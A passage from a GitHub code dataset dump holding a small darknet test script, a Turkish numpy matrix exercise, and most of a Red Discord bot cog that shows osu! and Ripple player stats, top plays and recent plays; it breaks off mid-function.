result\n","repo_name":"nikileshsa/sawtooth-core","sub_path":"ledger/transaction/endpoint_registry.py","file_name":"endpoint_registry.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31375874262","text":"import cv2\r\nfrom darknet_images import *\r\n\r\n\r\nargs = parser()\r\ncheck_arguments_errors(args)\r\n\r\nrandom.seed(3) # deterministic bbox colors\r\nnetwork, class_names, class_colors = darknet.load_network(\r\n args.config_file,\r\n args.data_file,\r\n args.weights,\r\n batch_size=args.batch_size\r\n)\r\n","repo_name":"jeffreypaul15/FinalYearProject","sub_path":"back_end/server_code/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6283581337","text":"#2X3 lük bir A matrisi oluşturun\n#3X2 lük bir B matrisi oluşturun\n\n#A ve B matrislerin çarpımını bir C matrisine eşitleyin\n\nimport numpy as np\n\nmatrisA = np.array([[1,2,3],\n [4,5,6]])\n\nmatrisB = np.array([[7,8],\n [9,10],\n [10,11]])\n\nmatrisC = np.dot(matrisA,matrisB)\nprint(matrisC)","repo_name":"Kadir-Akipek/DataSciencePython","sub_path":"DataScience/Numpy/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74959742986","text":"import os\r\nimport discord\r\nfrom discord.ext import commands\r\nfrom discord.utils import find\r\nfrom __main__ import send_cmd_help\r\nimport random, time, datetime\r\nimport aiohttp\r\nimport asyncio\r\nimport re, operator\r\nimport urllib.request\r\ntry:\r\n from bs4 import BeautifulSoup\r\nexcept:\r\n raise RuntimeError(\"bs4 required: pip install beautifulsoup4\")\r\nfrom .utils.dataIO import fileIO\r\nfrom cogs.utils import checks\r\nimport logging\r\n\r\nprefix = fileIO(\"data/red/settings.json\", \"load\")['PREFIXES'][0]\r\nhelp_msg = [\r\n \"**No linked account (`{}osuset user [username]`) or not using **`{}command [username] [gamemode]`\".format(prefix, prefix),\r\n \"**No linked account (`{}osuset user [username]`)**\".format(prefix)\r\n ]\r\nmodes = [\"osu\", \"taiko\", \"ctb\", \"mania\"]\r\n\r\nlog = logging.getLogger(\"red.osu\")\r\nlog.setLevel(logging.INFO)\r\n\r\nclass Osu:\r\n \"\"\"Cog to give osu! stats for all gamemodes.\"\"\"\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.osu_api_key = fileIO(\"data/osu/apikey.json\", \"load\")\r\n self.user_settings = fileIO(\"data/osu/user_settings.json\", \"load\")\r\n self.track = fileIO(\"data/osu/track.json\", \"load\")\r\n self.osu_settings = fileIO(\"data/osu/osu_settings.json\", \"load\")\r\n self.num_max_prof = 8\r\n self.max_map_disp = 3\r\n\r\n # ---------------------------- Settings ------------------------------------\r\n @commands.group(pass_context=True)\r\n async def osuset(self, ctx):\r\n \"\"\"Where you can define some settings\"\"\"\r\n if ctx.invoked_subcommand is None:\r\n await send_cmd_help(ctx)\r\n return\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.is_owner()\r\n async def tracktop(self, ctx, top_num:int):\r\n \"\"\" Set # of top plays being tracked \"\"\"\r\n msg = \"\"\r\n if top_num < 1 or top_num > 100:\r\n msg = \"**Please enter a valid number. (1 - 100)**\"\r\n else:\r\n self.osu_settings[\"num_track\"] = top_num\r\n msg = \"**Now tracking Top {} Plays.**\".format(top_num)\r\n fileIO(\"data/osu/osu_settings.json\", \"save\", self.osu_settings)\r\n await self.bot.say(msg)\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.is_owner()\r\n async def displaytop(self, ctx, top_num:int):\r\n \"\"\" Set # of best plays being displayed in top command \"\"\"\r\n msg = \"\"\r\n if top_num < 1 or top_num > 10:\r\n msg = \"**Please enter a valid number. (1 - 10)**\"\r\n else:\r\n self.osu_settings[\"num_best_plays\"] = top_num\r\n msg = \"**Now Displaying Top {} Plays.**\".format(top_num)\r\n fileIO(\"data/osu/osu_settings.json\", \"save\", self.osu_settings)\r\n await self.bot.say(msg)\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.serverowner_or_permissions(administrator=True)\r\n async def tracking(self, ctx, toggle=None):\r\n \"\"\" For disabling tracking on server (enable/disable) \"\"\"\r\n server = ctx.message.server\r\n\r\n if server.id not in self.osu_settings:\r\n self.osu_settings[server.id] = {}\r\n self.osu_settings[server.id][\"tracking\"] = True\r\n\r\n status = \"\"\r\n if not toggle:\r\n self.osu_settings[server.id][\"tracking\"] = not self.osu_settings[server.id][\"tracking\"]\r\n if self.osu_settings[server.id][\"tracking\"]:\r\n status = \"Enabled\"\r\n else:\r\n status = \"Disabled\"\r\n elif toggle.lower() == \"enable\":\r\n self.osu_settings[server.id][\"tracking\"] = True\r\n status = \"Enabled\"\r\n elif toggle.lower() == \"disable\":\r\n self.osu_settings[server.id][\"tracking\"] = False\r\n status = \"Disabled\"\r\n fileIO(\"data/osu/osu_settings.json\", \"save\", self.osu_settings)\r\n await self.bot.say(\"**Player Tracking {} on {}.**\".format(server.name, status))\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.mod_or_permissions(manage_messages=True)\r\n async def overview(self, ctx):\r\n \"\"\" Get an overview of your settings \"\"\"\r\n server = ctx.message.server\r\n user = ctx.message.author\r\n\r\n em = discord.Embed(description='', colour=user.colour)\r\n em.set_author(name=\"Current Settings for {}\".format(server.name), icon_url = server.icon_url)\r\n\r\n # determine api to use\r\n if server.id in self.osu_settings and \"api\" in self.osu_settings[server.id]:\r\n if self.osu_settings[server.id][\"api\"] == self.osu_settings[\"type\"][\"default\"]:\r\n api = \"Official Osu! API\"\r\n elif self.osu_settings[server.id][\"api\"] == self.osu_settings[\"type\"][\"ripple\"]:\r\n api = \"Ripple API\"\r\n else:\r\n api = \"Official Osu! API\"\r\n\r\n # determine\r\n if server.id not in self.osu_settings or \"tracking\" not in self.osu_settings[server.id] or self.osu_settings[server.id][\"tracking\"] == True:\r\n tracking = \"Enabled\"\r\n else:\r\n tracking = \"Disabled\"\r\n\r\n info = \"\"\r\n info += \"**▸ Default API:** {}\\n\".format(api)\r\n info += \"**▸ Tracking:** {}\\n\".format(tracking)\r\n\r\n if tracking == \"Enabled\":\r\n info += \"**▸ Tracking Number:** {}\\n\".format(self.osu_settings['num_track'])\r\n info += \"**▸ Top Plays:** {}\".format(self.osu_settings['num_best_plays'])\r\n\r\n em.description = info\r\n await self.bot.say(embed = em)\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n @checks.is_owner()\r\n async def api(self, ctx, *, choice):\r\n \"\"\"'official' or 'ripple'\"\"\"\r\n server = ctx.message.server\r\n if server.id not in self.osu_settings:\r\n self.osu_settings[server.id] = {}\r\n\r\n if not choice.lower() == \"official\" and not choice.lower() == \"ripple\":\r\n await self.bot.say(\"The two choices are `official` and `ripple`\")\r\n return\r\n elif choice.lower() == \"official\":\r\n self.osu_settings[server.id][\"api\"] = self.osu_settings[\"type\"][\"default\"]\r\n elif choice.lower() == \"ripple\":\r\n self.osu_settings[server.id][\"api\"] = self.osu_settings[\"type\"][\"ripple\"]\r\n fileIO(\"data/osu/osu_settings.json\", \"save\", self.osu_settings)\r\n await self.bot.say(\"**Switched to `{}` server as default on `{}`.** :arrows_counterclockwise:\".format(choice, server.name))\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n async def default(self, ctx, mode:str):\r\n \"\"\" Set your default gamemode \"\"\"\r\n user = ctx.message.author\r\n server = ctx.message.server\r\n\r\n if mode.lower() in modes:\r\n gamemode = modes.index(mode.lower())\r\n elif int(mode) >= 0 and int(mode) <= 3:\r\n gamemode = int(mode)\r\n else:\r\n await self.bot.say(\"**Please enter a valid gamemode.**\")\r\n return\r\n\r\n if user.id in self.user_settings:\r\n self.user_settings[user.id]['default_gamemode'] = int(gamemode)\r\n await self.bot.say(\"**`{}`'s default gamemode has been set to `{}`.** :white_check_mark:\".format(user.name, modes[gamemode]))\r\n fileIO('data/osu/user_settings.json', \"save\", self.user_settings)\r\n else:\r\n await self.bot.say(help_msg[1])\r\n\r\n @commands.group(pass_context=True)\r\n async def osutrack(self, ctx):\r\n \"\"\"Where you can define some settings\"\"\"\r\n if ctx.invoked_subcommand is None:\r\n await send_cmd_help(ctx)\r\n return\r\n\r\n @osuset.command(pass_context=True)\r\n @checks.is_owner()\r\n async def key(self, ctx):\r\n \"\"\"Sets your osu api key\"\"\"\r\n await self.bot.whisper(\"Type your osu! api key. You can reply here.\")\r\n key = await self.bot.wait_for_message(timeout=30, author=ctx.message.author)\r\n if key is None:\r\n return\r\n else:\r\n self.osu_api_key[\"osu_api_key\"] = key.content\r\n fileIO(\"data/osu/apikey.json\", \"save\", self.osu_api_key)\r\n await self.bot.whisper(\"API Key details added. :white_check_mark:\")\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def osu(self, ctx, *username):\r\n \"\"\"Gives osu user(s) stats. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_info(ctx, username, 0)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def osutop(self, ctx, *username):\r\n \"\"\"Gives top osu plays. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_top(ctx, username, 0)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def taiko(self, ctx, *username):\r\n \"\"\"Gives taiko user(s) stats. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_info(ctx, username, 1)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def taikotop(self, ctx, *username):\r\n \"\"\"Gives top taiko plays. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_top(ctx, username, 1)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def ctb(self, ctx, *username):\r\n \"\"\"Gives ctb user(s) stats. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_info(ctx, username, 2)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def ctbtop(self, ctx, *username):\r\n \"\"\"Gives ctb osu plays. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_top(ctx, username, 2)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def mania(self, ctx, *username):\r\n \"\"\"Gives mania user(s) stats. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_info(ctx, username, 3)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def maniatop(self, ctx, *username):\r\n \"\"\"Gives top mania plays. Use -ripple/-official to use specific api.\"\"\"\r\n await self._process_user_top(ctx, username, 3)\r\n\r\n @commands.command(pass_context=True, no_pm=True)\r\n async def recent(self, ctx, *username):\r\n \"\"\"Gives recent plays of player with respect to user's default gamemode. [p]recent [username] (gamemode:optional)\"\"\"\r\n await self._process_user_recent(ctx, username)\r\n\r\n @osuset.command(pass_context=True, no_pm=True)\r\n async def user(self, ctx, *, username):\r\n \"\"\"Sets user information given an osu! username\"\"\"\r\n user = ctx.message.author\r\n channel = ctx.message.channel\r\n server = user.server\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n if user.server.id not in self.user_settings:\r\n self.user_settings[user.server.id] = {}\r\n\r\n if not self._check_user_exists(user):\r\n try:\r\n osu_user = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, 1))\r\n newuser = {\r\n \"discord_username\": user.name,\r\n \"osu_username\": username,\r\n \"osu_user_id\": osu_user[0][\"user_id\"],\r\n \"default_gamemode\": 0,\r\n \"ripple_username\": \"\"\r\n }\r\n\r\n self.user_settings[user.id] = newuser\r\n fileIO('data/osu/user_settings.json', \"save\", self.user_settings)\r\n await self.bot.say(\"{}, your account has been linked to osu! username `{}`\".format(user.mention, osu_user[0][\"username\"]))\r\n except:\r\n await self.bot.say(\"{} doesn't exist in the osu! database.\".format(username))\r\n else:\r\n try:\r\n osu_user = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, 1))\r\n self.user_settings[user.id][\"osu_username\"] = username\r\n self.user_settings[user.id][\"osu_user_id\"] = osu_user[0][\"user_id\"]\r\n fileIO('data/osu/user_settings.json', \"save\", self.user_settings)\r\n await self.bot.say(\"{}, your osu! username has been edited to `{}`\".format(user.mention, osu_user[0][\"username\"]))\r\n except:\r\n await self.bot.say(\"{} doesn't exist in the osu! database.\".format(username))\r\n\r\n # Gets json information to proccess the small version of the image\r\n async def _process_user_info(self, ctx, usernames, gamemode:int):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n server = user.server\r\n\r\n if not usernames:\r\n usernames = [None]\r\n # get rid of duplicates\r\n usernames = list(set(usernames))\r\n\r\n # determine api to use\r\n usernames, api = self._determine_api(server, usernames)\r\n\r\n # gives the final input for osu username\r\n final_usernames = []\r\n for username in usernames:\r\n test_username = await self._process_username(ctx, username)\r\n if test_username != None:\r\n final_usernames.append(test_username)\r\n\r\n # testing if username is osu username\r\n all_user_info = []\r\n sequence = []\r\n\r\n count_valid = 0\r\n for i in range(len(final_usernames)):\r\n userinfo = list(await get_user(key, api, final_usernames[i], gamemode)) # get user info from osu api\r\n if userinfo != None and len(userinfo) > 0 and userinfo[0]['pp_raw'] != None:\r\n all_user_info.append(userinfo[0])\r\n sequence.append((count_valid, int(userinfo[0][\"pp_rank\"])))\r\n count_valid = count_valid + 1\r\n else:\r\n await self.bot.say(\"**`{}` has not played enough.**\".format(final_usernames[i]))\r\n\r\n sequence = sorted(sequence, key=operator.itemgetter(1))\r\n\r\n all_players = []\r\n for i, pp in sequence:\r\n all_players.append(await self._get_user_info(api, server, user, all_user_info[i], gamemode))\r\n\r\n disp_num = min(self.num_max_prof, len(all_players))\r\n if disp_num < len(all_players):\r\n await self.bot.say(\"Found {} users, but displaying top {}.\".format(len(all_players), disp_num))\r\n\r\n for player in all_players[0:disp_num]:\r\n await self.bot.say(embed=player)\r\n\r\n # takes iterable of inputs and determines api, also based on defaults\r\n def _determine_api(self, server, inputs):\r\n if not inputs or ('-ripple' not in inputs and '-official' not in inputs): # in case not specified\r\n if server.id in self.osu_settings and \"api\" in self.osu_settings[server.id]:\r\n if self.osu_settings[server.id][\"api\"] == self.osu_settings[\"type\"][\"default\"]:\r\n api = self.osu_settings[\"type\"][\"default\"]\r\n elif self.osu_settings[server.id][\"api\"] == self.osu_settings[\"type\"][\"ripple\"]:\r\n api = self.osu_settings[\"type\"][\"ripple\"]\r\n else:\r\n api = self.osu_settings[\"type\"][\"default\"]\r\n elif '-ripple' in inputs:\r\n inputs = list(inputs)\r\n inputs.remove('-ripple')\r\n api = self.osu_settings[\"type\"][\"ripple\"]\r\n elif '-official' in inputs:\r\n inputs = list(inputs)\r\n inputs.remove('-official')\r\n api = self.osu_settings[\"type\"][\"default\"]\r\n\r\n if not inputs:\r\n inputs = [None]\r\n\r\n return inputs, api\r\n\r\n # Gets the user's most recent score\r\n async def _process_user_recent(self, ctx, inputs):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n server = user.server\r\n\r\n # forced handle gamemode\r\n gamemode = -1\r\n inputs = list(inputs)\r\n for mode in modes:\r\n if len(inputs) >= 2 and mode in inputs:\r\n gamemode = self._get_gamemode_number(mode)\r\n inputs.remove(mode)\r\n elif len(inputs) == 1 and mode == inputs[0]:\r\n gamemode = self._get_gamemode_number(mode)\r\n inputs.remove(mode)\r\n inputs = tuple(inputs)\r\n\r\n # handle api and username (1)\r\n username, api = self._determine_api(server, list(inputs))\r\n username = username[0]\r\n\r\n # gives the final input for osu username\r\n test_username = await self._process_username(ctx, username)\r\n if test_username:\r\n username = test_username\r\n else:\r\n return\r\n\r\n # determines which recent gamemode to display based on user\r\n if gamemode == -1:\r\n target_id = self._get_discord_id(username, api)\r\n if target_id != -1:\r\n gamemode = self.user_settings[target_id]['default_gamemode']\r\n elif target_id == -1 and self._check_user_exists(user):\r\n gamemode = self.user_settings[user.id]['default_gamemode']\r\n else:\r\n gamemode = 0\r\n\r\n # get userinfo\r\n userinfo = list(await get_user(key, api, username, gamemode))\r\n userrecent = list(await get_user_recent(key, api, username, gamemode))\r\n if not userinfo or not userrecent:\r\n await self.bot.say(\"**`{}` was not found or no recent plays in `{}`.**\".format(username, self._get_gamemode(gamemode)))\r\n return\r\n else:\r\n userinfo = userinfo[0]\r\n userrecent = userrecent[0]\r\n msg, recent_play = await self._get_recent(ctx, api, userinfo, userrecent, gamemode)\r\n await self.bot.say(msg, embed=recent_play)\r\n\r\n def _get_discord_id(self, username:str, api:str):\r\n #if api == self.osu_settings[\"type\"][\"ripple\"]:\r\n #name_type = \"ripple_username\"\r\n #else:\r\n #name_type = \"osu_username\"\r\n # currently assumes same name\r\n name_type = \"osu_username\"\r\n\r\n for user_id in self.user_settings.keys():\r\n if self.user_settings[user_id] and username in self.user_settings[user_id][name_type]:\r\n return user_id\r\n return -1\r\n\r\n # Gets information to proccess the top play version of the image\r\n async def _process_user_top(self, ctx, username, gamemode: int):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n server = user.server\r\n\r\n # determine api to use\r\n username, api = self._determine_api(server, list(username))\r\n username = username[0]\r\n\r\n # gives the final input for osu username\r\n test_username = await self._process_username(ctx, username)\r\n if test_username:\r\n username = test_username\r\n else:\r\n return\r\n\r\n # get userinfo\r\n userinfo = list(await get_user(key, api, username, gamemode))\r\n userbest = list(await get_user_best(key, api, username, gamemode, self.osu_settings['num_best_plays']))\r\n if userinfo and userbest:\r\n msg, top_plays = await self._get_user_top(ctx, api, userinfo[0], userbest, gamemode)\r\n await self.bot.say(msg, embed=top_plays)\r\n else:\r\n await self.bot.say(\"**`{}` was not found or not enough plays.**\".format(username))\r\n\r\n ## processes username. probably the worst chunck of code in this project so far. will fix/clean later\r\n async def _process_username(self, ctx, username):\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n server = user.server\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n # if nothing is given, must rely on if there's account\r\n if not username:\r\n if self._check_user_exists(user):\r\n username = self.user_settings[user.id][\"osu_username\"]\r\n else:\r\n await self.bot.say(\"It doesn't seem that you have an account linked. Do **{}osuset user [username]**.\".format(prefix))\r\n return None # bad practice, but too lazy to make it nice\r\n # if it's a discord user, first check to see if they are in database and choose that username\r\n # then see if the discord username is a osu username, then try the string itself\r\n elif find(lambda m: m.name == username, channel.server.members) is not None:\r\n target = find(lambda m: m.name == username, channel.server.members)\r\n try:\r\n self._check_user_exists(target)\r\n username = self.user_settings[target.id][\"osu_username\"]\r\n except:\r\n if await get_user(key, self.osu_settings[\"type\"][\"default\"], username, 0):\r\n username = str(target)\r\n else:\r\n await self.bot.say(help_msg[1])\r\n return\r\n # @ implies its a discord user (if not, it will just say user not found in the next section)\r\n # if not found, then oh well.\r\n elif \"@\" in username:\r\n user_id = re.findall(\"\\d+\", username)\r\n user_id = user_id[0]\r\n if user_id in self.user_settings:\r\n username = self.user_settings[user_id][\"osu_username\"]\r\n else:\r\n await self.bot.say(help_msg[1])\r\n return\r\n else:\r\n username = str(username)\r\n\r\n return username\r\n\r\n # Checks if user exists\r\n def _check_user_exists(self, user):\r\n if user.id not in self.user_settings:\r\n return False\r\n return True\r\n\r\n def _get_api_name(self, url:str):\r\n if url == self.osu_settings[\"type\"][\"ripple\"]:\r\n return \"Ripple\"\r\n else:\r\n return \"Official\"\r\n\r\n # Gives a small user profile\r\n async def _get_user_info(self, api:str, server, server_user, user, gamemode: int):\r\n if api == self.osu_settings[\"type\"][\"default\"]:\r\n profile_url ='http://s.ppy.sh/a/{}.png'.format(user['user_id'])\r\n pp_country_rank = \" ({}#{})\".format(user['country'], user['pp_country_rank'])\r\n elif api == self.osu_settings[\"type\"][\"ripple\"]:\r\n profile_url = 'http://a.ripple.moe/{}.png'.format(user['user_id'])\r\n pp_country_rank = \"\"\r\n\r\n flag_url = 'https://new.ppy.sh//images/flags/{}.png'.format(user['country'])\r\n\r\n gamemode_text = self._get_gamemode(gamemode)\r\n\r\n try:\r\n user_url = 'https://{}/u/{}'.format(api, user['user_id'])\r\n em = discord.Embed(description='', colour=server_user.colour)\r\n em.set_author(name=\"{} Profile for {}\".format(gamemode_text, user['username']), icon_url = flag_url, url = user_url)\r\n em.set_thumbnail(url=profile_url)\r\n level_int = int(float(user['level']))\r\n level_percent = float(user['level']) - level_int\r\n\r\n info = \"\"\r\n info += \"**▸ {} Rank:** #{} {}\\n\".format(self._get_api_name(api), user['pp_rank'], pp_country_rank)\r\n info += \"**▸ Level:** {} ({:.2f}%)\\n\".format(level_int, level_percent*100)\r\n info += \"**▸ Total PP:** {}\\n\".format(user['pp_raw'])\r\n info += \"**▸ Playcount:** {}\\n\".format(user['playcount'])\r\n info += \"**▸ Hit Accuracy:** {}%\".format(user['accuracy'][0:5])\r\n em.description = info\r\n if api == self.osu_settings[\"type\"][\"default\"]:\r\n soup = BeautifulSoup(urllib.request.urlopen(\"https://osu.ppy.sh/u/{}\".format(user['user_id'])), \"html.parser\")\r\n timestamps = []\r\n for tag in soup.findAll(attrs={'class': 'timeago'}):\r\n timestamps.append(datetime.datetime.strptime(tag.contents[0].strip().replace(\" UTC\", \"\"), '%Y-%m-%d %H:%M:%S'))\r\n timeago = datetime.datetime(1,1,1) + (datetime.datetime.utcnow() - timestamps[1])\r\n time_ago = \"Last Online \"\r\n if timeago.year-1 != 0:\r\n time_ago += \"{} Years \".format(timeago.year-1)\r\n if timeago.month-1 !=0:\r\n time_ago += \"{} Months \".format(timeago.month-1)\r\n if timeago.day-1 !=0:\r\n time_ago += \"{} Days \".format(timeago.day-1)\r\n if timeago.hour != 0:\r\n time_ago += \"{} Hours \".format(timeago.hour)\r\n if timeago.minute != 0:\r\n time_ago += \"{} Minutes \".format(timeago.minute)\r\n time_ago += \"{} Seconds ago\".format(timeago.second)\r\n em.set_footer(text=time_ago)\r\n return em\r\n except:\r\n return None\r\n\r\n async def _get_recent(self, ctx, api, user, userrecent, gamemode:int):\r\n server_user = ctx.message.author\r\n server = ctx.message.server\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n if api == self.osu_settings[\"type\"][\"default\"]:\r\n profile_url = 'http://s.ppy.sh/a/{}.png'.format(user['user_id'])\r\n elif api == self.osu_settings[\"type\"][\"ripple\"]:\r\n profile_url = 'http://a.ripple.moe/{}.png'.format(user['user_id'])\r\n\r\n flag_url = 'https://new.ppy.sh//images/flags/{}.png'.format(user['country'])\r\n\r\n # get best plays map information and scores\r\n beatmap = list(await get_beatmap(key, api, beatmap_id=userrecent['beatmap_id']))[0]\r\n if not userrecent:\r\n return (\"**No recent score for `{}` in user's default gamemode (`{}`)**\".format(user['username'], self._get_gamemode(gamemode)), None)\r\n acc = self.calculate_acc(userrecent, gamemode)\r\n mods = self.mod_calculation(userrecent['enabled_mods'])\r\n if not mods:\r\n mods = []\r\n mods.append('No Mod')\r\n beatmap_url = 'https://osu.ppy.sh/b/{}'.format(beatmap['beatmap_id'])\r\n\r\n msg = \"**Most Recent {} Play for {}:**\".format(self._get_gamemode(gamemode), user['username'])\r\n\r\n info = \"\"\r\n info += \"▸ **Rank:** {} ▸ **Combo:** x{}\\n\".format(userrecent['rank'], userrecent['maxcombo'])\r\n info += \"▸ **Score:** {} ▸ **Misses:** {}\\n\".format(userrecent['score'], userrecent['countmiss'])\r\n info += \"▸ **Acc:** {:.2f}% ▸ **Stars:** {:.2f}★\\n\".format(float(acc), float(beatmap['difficultyrating']))\r\n\r\n # grab beatmap image\r\n page = urllib.request.urlopen(beatmap_url)\r\n soup = BeautifulSoup(page.read(), \"html.parser\")\r\n map_image = [x['src'] for x in soup.findAll('img', {'class': 'bmt'})]\r\n map_image_url = 'http:{}'.format(map_image[0]).replace(\" \",\"%\")\r\n\r\n em = discord.Embed(description=info, colour=server_user.colour)\r\n em.set_author(name=\"{} [{}] +{}\".format(beatmap['title'], beatmap['version'], \",\".join(mods)), url = beatmap_url, icon_url = profile_url)\r\n em.set_thumbnail(url=map_image_url)\r\n em.set_footer(text = \"{} On Osu! {} Server\".format(userrecent['date'], self._get_api_name(api)))\r\n return (msg, em)\r\n\r\n # Gives a user profile image with some information\r\n async def _get_user_top(self, ctx, api, user, userbest, gamemode:int):\r\n server_user = ctx.message.author\r\n server = ctx.message.server\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n if api == self.osu_settings[\"type\"][\"default\"]:\r\n profile_url = 'http://s.ppy.sh/a/{}.png'.format(user['user_id'])\r\n elif api == self.osu_settings[\"type\"][\"ripple\"]:\r\n profile_url = 'http://a.ripple.moe/{}.png'.format(user['user_id'])\r\n\r\n gamemode_text = self._get_gamemode(gamemode)\r\n\r\n # get best plays map information and scores\r\n best_beatmaps = []\r\n best_acc = []\r\n for i in range(self.osu_settings['num_best_plays']):\r\n beatmap = list(await get_beatmap(key, api, beatmap_id=userbest[i]['beatmap_id']))[0]\r\n score = list(await get_scores(key, api, userbest[i]['beatmap_id'], user['user_id'], gamemode))[0]\r\n best_beatmaps.append(beatmap)\r\n best_acc.append(self.calculate_acc(score,gamemode))\r\n\r\n all_plays = []\r\n msg = \"**Top {} {} Plays for {}:**\".format(self.osu_settings['num_best_plays'], gamemode_text, user['username'])\r\n desc = ''\r\n for i in range(self.osu_settings['num_best_plays']):\r\n mods = self.mod_calculation(userbest[i]['enabled_mods'])\r\n if not mods:\r\n mods = []\r\n mods.append('No Mod')\r\n beatmap_url = 'https://osu.ppy.sh/b/{}'.format(best_beatmaps[i]['beatmap_id'])\r\n\r\n info = ''\r\n info += '***{}. [__{} [{}]__]({}) +{}\\n***'.format(i+1, best_beatmaps[i]['title'], best_beatmaps[i]['version'], beatmap_url, ','.join(mods))\r\n info += '▸ **Rank:** {} ▸ **PP:** {:.2f}\\n'.format(userbest[i]['rank'], float(userbest[i]['pp']))\r\n info += '▸ **Score:** {} ▸ **Combo:** x{}\\n'.format(userbest[i]['score'], userbest[i]['maxcombo'])\r\n info += '▸ **Acc:** {:.2f}% ▸ **Stars:** {:.2f}★\\n\\n'.format(float(best_acc[i]), float(best_beatmaps[i]['difficultyrating']))\r\n desc += info\r\n em = discord.Embed(description=desc, colour=server_user.colour)\r\n em.set_footer(text = \"On Osu! {} Server\".format(self._get_api_name(api)))\r\n em.set_thumbnail(url=profile_url)\r\n\r\n return (msg, em)\r\n\r\n def _get_gamemode(self, gamemode:int):\r\n if gamemode == 1:\r\n gamemode_text = \"Taiko\"\r\n elif gamemode == 2:\r\n gamemode_text = \"Catch the Beat!\"\r\n elif gamemode == 3:\r\n gamemode_text = \"Osu! Mania\"\r\n else:\r\n gamemode_text = \"Osu! Standard\"\r\n return gamemode_text\r\n\r\n def _get_gamemode_display(self, gamemode):\r\n if gamemode == \"osu\":\r\n gamemode_text = \"Osu! Standard\"\r\n elif gamemode == \"ctb\":\r\n gamemode_text = \"Catch the Beat!\"\r\n elif gamemode == \"mania\":\r\n gamemode_text = \"Osu! Mania\"\r\n elif gamemode == \"taiko\":\r\n gamemode_text = \"Taiko\"\r\n return gamemode_text\r\n\r\n def _get_gamemode_number(self, gamemode:str):\r\n if gamemode == \"taiko\":\r\n gamemode_text = 1\r\n elif gamemode == \"ctb\":\r\n gamemode_text = 2\r\n elif gamemode == \"mania\":\r\n gamemode_text = 3\r\n else:\r\n gamemode_text = 0\r\n return int(gamemode_text)\r\n\r\n def calculate_acc(self, beatmap, gamemode:int):\r\n if gamemode == 0:\r\n total_unscale_score = float(beatmap['count300'])\r\n total_unscale_score += float(beatmap['count100'])\r\n total_unscale_score += float(beatmap['count50'])\r\n total_unscale_score += float(beatmap['countmiss'])\r\n total_unscale_score *=300\r\n user_score = float(beatmap['count300']) * 300.0\r\n user_score += float(beatmap['count100']) * 100.0\r\n user_score += float(beatmap['count50']) * 50.0\r\n elif gamemode == 1:\r\n total_unscale_score = float(beatmap['count300'])\r\n total_unscale_score += float(beatmap['count100'])\r\n total_unscale_score += float(beatmap['countmiss'])\r\n total_unscale_score *= 300\r\n user_score = float(beatmap['count300']) * 1.0\r\n user_score += float(beatmap['count100']) * 0.5\r\n user_score *= 300\r\n elif gamemode == 2:\r\n total_unscale_score = float(beatmap['count300'])\r\n total_unscale_score += float(beatmap['count100'])\r\n total_unscale_score += float(beatmap['count50'])\r\n total_unscale_score += float(beatmap['countmiss'])\r\n total_unscale_score += float(beatmap['countkatu'])\r\n user_score = float(beatmap['count300'])\r\n user_score += float(beatmap['count100'])\r\n user_score += float(beatmap['count50'])\r\n elif gamemode == 3:\r\n total_unscale_score = float(beatmap['count300'])\r\n total_unscale_score += float(beatmap['countgeki'])\r\n total_unscale_score += float(beatmap['countkatu'])\r\n total_unscale_score += float(beatmap['count100'])\r\n total_unscale_score += float(beatmap['count50'])\r\n total_unscale_score += float(beatmap['countmiss'])\r\n total_unscale_score *=300\r\n user_score = float(beatmap['count300']) * 300.0\r\n user_score += float(beatmap['countgeki']) * 300.0\r\n user_score += float(beatmap['countkatu']) * 200.0\r\n user_score += float(beatmap['count100']) * 100.0\r\n user_score += float(beatmap['count50']) * 50.0\r\n\r\n return (float(user_score)/float(total_unscale_score)) * 100.0\r\n\r\n # Truncates the text because some titles/versions are too long\r\n def truncate_text(self, text):\r\n if len(text) > 20:\r\n text = text[0:20] + '...'\r\n return text\r\n\r\n # gives a list of the ranked mods given a peppy number lol\r\n def mod_calculation(self, number):\r\n number = int(number)\r\n mod_list = []\r\n mods = ['PF', 'SO', 'FL', 'NC', 